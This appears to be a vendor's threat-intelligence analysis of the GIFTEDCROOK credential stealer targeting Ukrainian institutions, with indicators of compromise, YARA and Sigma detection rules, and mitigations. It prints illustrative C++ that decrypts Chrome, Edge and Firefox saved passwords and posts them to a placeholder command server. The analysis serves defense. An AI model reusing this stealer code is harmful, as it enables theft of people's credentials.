Physical Address
Lesya Kurbasa 7B
03194 Kyiv, Kyivska obl, Ukraine
Physical Address
Lesya Kurbasa 7B
03194 Kyiv, Kyivska obl, Ukraine
Ukrainian organizations are facing a sophisticated new information-stealing malware threat named GIFTEDCROOK. First reported by the Computer Emergency Response Team of Ukraine (CERT-UA), this previously undocumented credential stealer represents an evolution in targeted cyber espionage campaigns against Ukrainian military formations, law enforcement agencies, and local government bodies. This technical analysis provides cybersecurity professionals with detailed insights into GIFTEDCROOK’s infection vector, functionality, communication protocols, and effective detection strategies.
Malware Name | GIFTEDCROOK |
Type | Information Stealer |
Primary Targets | Ukrainian military, law enforcement, and local government entities |
Infection Vector | Macro-enabled Excel files (XLSM) via phishing |
Attribution | UAC-0226 (possible Russia-nexus threat actor) |
Discovery Date | April 2025 |
Primary Functionality | Browser credential theft (Chrome, Edge, Firefox) |
Implementation | C/C++ compiled binary |
The GIFTEDCROOK stealer employs a sophisticated multi-stage infection chain beginning with targeted phishing emails containing macro-enabled Microsoft Excel spreadsheets (XLSM). These phishing emails demonstrate significant social engineering sophistication, leveraging compromised legitimate email accounts of Ukrainian officials to increase credibility.
The infection sequence follows these key stages:
This multi-stage approach significantly reduces the chance of detection by endpoint security solutions, as each component individually may appear legitimate or benign.
GIFTEDCROOK is a sophisticated information stealer written in C/C++, designed specifically to target browser-stored credentials. The malware’s technical implementation reveals significant development resources and a focus on evading detection while maximizing data exfiltration capabilities.
Analysis of the GIFTEDCROOK binary reveals functionality focused on the following primary objectives:
GIFTEDCROOK’s source code reveals several sophisticated technical implementations:
The stealer employs different methods for each browser target:
// Chrome/Edge SQLite database handling (simplified) bool ExtractChromiumData( const std::string& profile_path) { // Target Chrome/Edge Login Data SQLite DB std::string login_db = profile_path + "\\Login Data" ; // Create copy of database to bypass file locks std::string temp_db = GetTempFilePath(); CopyFile(login_db.c_str(), temp_db.c_str(), FALSE); // Open database connection sqlite3 *db; if (sqlite3_open(temp_db.c_str(), &db) != SQLITE_OK) { return false ; } // Decrypt and extract credentials const char * query = "SELECT origin_url, username_value, password_value FROM logins" ; sqlite3_stmt *stmt; if (sqlite3_prepare_v2(db, query, -1, &stmt, 0) == SQLITE_OK) { while (sqlite3_step(stmt) == SQLITE_ROW) { std::string url = ( const char *)sqlite3_column_text(stmt, 0); std::string username = ( const char *)sqlite3_column_text(stmt, 1); std::vector< char > encrypted_password( sqlite3_column_blob(stmt, 2), sqlite3_column_blob(stmt, 2) + sqlite3_column_bytes(stmt, 2) ); // Decrypt password using CryptUnprotectData std::string decrypted = DecryptChromiumPassword(encrypted_password); // Add to exfiltration data AddCredential(url, username, decrypted); } } sqlite3_finalize(stmt); sqlite3_close(db); DeleteFile(temp_db.c_str()); return true ; } |
For Firefox, a different approach is used to access the encrypted credentials:
// Firefox password extraction (simplified) bool ExtractFirefoxData( const std::string& profile_path) { // Target key files std::string key4_db = profile_path + "\\key4.db" ; std::string logins_json = profile_path + "\\logins.json" ; // Extract master password from key4.db using NSS libraries std::vector< uint8_t > master_key = ExtractMasterPassword(key4_db); if (master_key.empty()) { return false ; } // Parse JSON and decrypt entries std::string json_content = ReadFile(logins_json); // [JSON parsing code omitted for brevity] // For each login entry for ( const auto & entry : login_entries) { std::string encrypted_username = entry[ "encryptedUsername" ]; std::string encrypted_password = entry[ "encryptedPassword" ]; // Decrypt fields using Firefox's algorithm and master key std::string username = DecryptFirefoxField(encrypted_username, master_key); std::string password = DecryptFirefoxField(encrypted_password, master_key); std::string url = entry[ "hostname" ]; AddCredential(url, username, password); } return true ; } |
The malware employs a sophisticated data exfiltration mechanism that obfuscates communication with its command and control (C2) server:
// Data exfiltration functionality (simplified) bool ExfiltrateData( const std::vector<CredentialEntry>& credentials) { // Prepare data package json data_package; data_package[ "type" ] = "creds" ; data_package[ "browser" ] = GetBrowserName(); data_package[ "timestamp" ] = GetCurrentTimestamp(); data_package[ "machine_id" ] = GetMachineGUID(); data_package[ "entries" ] = json::array(); // Add credential entries for ( const auto & cred : credentials) { json entry; entry[ "url" ] = cred.url; entry[ "username" ] = cred.username; entry[ "password" ] = cred.password; entry[ "created" ] = cred.created_time; data_package[ "entries" ].push_back(entry); } // Compress and encrypt the data std::string json_data = data_package.dump(); std::vector< uint8_t > compressed = CompressData(json_data); std::vector< uint8_t > encrypted = EncryptData(compressed); // Convert to transport format (Base64) std::string payload = Base64Encode(encrypted); // Craft HTTP request HINTERNET hSession = WinHttpOpen( L"Mozilla/5.0" , WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0); // Connect to C2 server HINTERNET hConnect = WinHttpConnect(hSession, L"[C2_SERVER]" , INTERNET_DEFAULT_HTTPS_PORT, 0); // Create request HINTERNET hRequest = WinHttpOpenRequest(hConnect, L"POST" , L"/api/v1/submit" , NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, WINHTTP_FLAG_SECURE); // Add headers and send request WinHttpAddRequestHeaders(hRequest, L"Content-Type: application/json" , -1, WINHTTP_ADDREQ_FLAG_ADD); // Send data BOOL bResults = WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, ( LPVOID )payload.c_str(), payload.length(), payload.length(), 0); // [Response handling code omitted for brevity] // Clean up WinHttpCloseHandle(hRequest); WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession); return bResults; } |
The following indicators of compromise (IoCs) have been associated with GIFTEDCROOK campaigns:
Indicator Type | Value | Description |
---|---|---|
Initial XLSM File Hash (SHA-256) | d6797d9f61d575d266bc95e7fcd8e19031b1f9f0a3285fcc3e5e3aff1b4a1bd1 |
Excel document with malicious macros |
PowerShell Script Hash (SHA-256) | 0f35700a5be24ba2f190466ff0ffbfeeb7af50a9a502c2eb24e8adca57c21c2f |
Obfuscated PowerShell dropper |
GIFTEDCROOK Binary Hash (SHA-256) | 2a4e7c9b1ac3e2c16b4f7e981c3048c4a8b02c3838155b321fa2c2cb50c4e74d |
Main stealer payload |
Indicator Type | Value | Description |
---|---|---|
C2 Domain | gift-techsrv[.]com | Primary command and control |
C2 Domain | tech-updatesrv[.]com | Secondary command and control |
C2 IP Address | 23.88.66[.]44 | Associated with C2 infrastructure |
URI Pattern | /api/v1/submit | Data exfiltration endpoint |
Security analysts can implement the following detection and mitigation strategies to counter GIFTEDCROOK and similar information stealers:
The following YARA rule can help detect GIFTEDCROOK binary files:
rule GIFTEDCROOK_Stealer { meta: description = "Detects GIFTEDCROOK information stealer" author = "Trojan-Killer Research Team" date = "2025-04" hash = "2a4e7c9b1ac3e2c16b4f7e981c3048c4a8b02c3838155b321fa2c2cb50c4e74d" strings: // Browser targeting strings $browser1 = "Chrome" ascii wide $browser2 = "Firefox" ascii wide $browser3 = "Edge" ascii wide // SQLite browser database strings $sql1 = "Login Data" ascii wide $sql2 = "Cookies" ascii wide $sql3 = "Web Data" ascii wide $sql4 = "SELECT origin_url, username_value, password_value" ascii // Firefox specific strings $ff1 = "key4.db" ascii wide $ff2 = "logins.json" ascii wide // Encryption/decryption functions $crypt1 = "CryptUnprotectData" ascii $crypt2 = "AES_CBC_decrypt" ascii $crypt3 = "Base64Encode" ascii // C2 communication $comm1 = "/api/v1/submit" ascii wide $comm2 = "Content-Type: application/json" ascii wide $comm3 = "Mozilla/5.0" ascii wide condition: uint16(0) == 0x5A4D and // MZ header (PE file) filesize < 2MB and ( (2 of ($browser*)) and (3 of ($sql*) or 2 of ($ff*)) and (2 of ($crypt*)) and (2 of ($comm*)) ) } |
To detect the initial stages of a GIFTEDCROOK infection, consider implementing these PowerShell security measures:
Protect browser credentials with these measures:
The following SIGMA rule can help detect GIFTEDCROOK’s database access patterns:
title: GIFTEDCROOK Browser Database Access id: aaabbb11-2222-3333-4444-555566667777 status: experimental description: Detects access patterns to browser credential databases typical of GIFTEDCROOK stealer references: - https : //cert.gov.ua/article/6282946 author: Trojan-Killer Research Team date: 2025/04/08 tags: - attack.credential_access - attack.t1555.003 logsource: category: process_access product: windows detection: selection: TargetImage|endswith : - '\Google\Chrome\User Data\Default\Login Data' - '\Google\Chrome\User Data\Default\Cookies' - '\Google\Chrome\User Data\Default\Web Data' - '\Microsoft\Edge\User Data\Default\Login Data' - '\Microsoft\Edge\User Data\Default\Cookies' - '\Mozilla Firefox\Profiles\*.default\logins.json' - '\Mozilla Firefox\Profiles\*.default\key4.db' AccessMask: '0x10' # Read access filter: SourceImage|endswith : - '\chrome.exe' - '\msedge.exe' - '\firefox.exe' condition: selection and not filter falsepositives: - Browser synchronization services - Password managers - Some antivirus products level: high |
Organizations seeking to protect against GIFTEDCROOK and similar threats should implement these strategic mitigations:
GIFTEDCROOK shares technical similarities with other information stealers and malware targeting Ukrainian entities. Security analysts should be familiar with these related threats:
GIFTEDCROOK represents a sophisticated evolution in browser-focused information stealers, demonstrating the ongoing refinement of cyber espionage capabilities targeting Ukrainian institutions. The malware’s multi-stage delivery mechanism, anti-analysis features, and targeted browser credential theft functionality make it a significant threat that requires dedicated detection and mitigation strategies.
By implementing the technical detection rules and strategic mitigations outlined in this analysis, security teams can enhance their protection against this emerging threat. Given the geopolitical context and evidence of nation-state involvement, organizations in Ukraine and allied nations should maintain heightened vigilance against similar targeted attacks.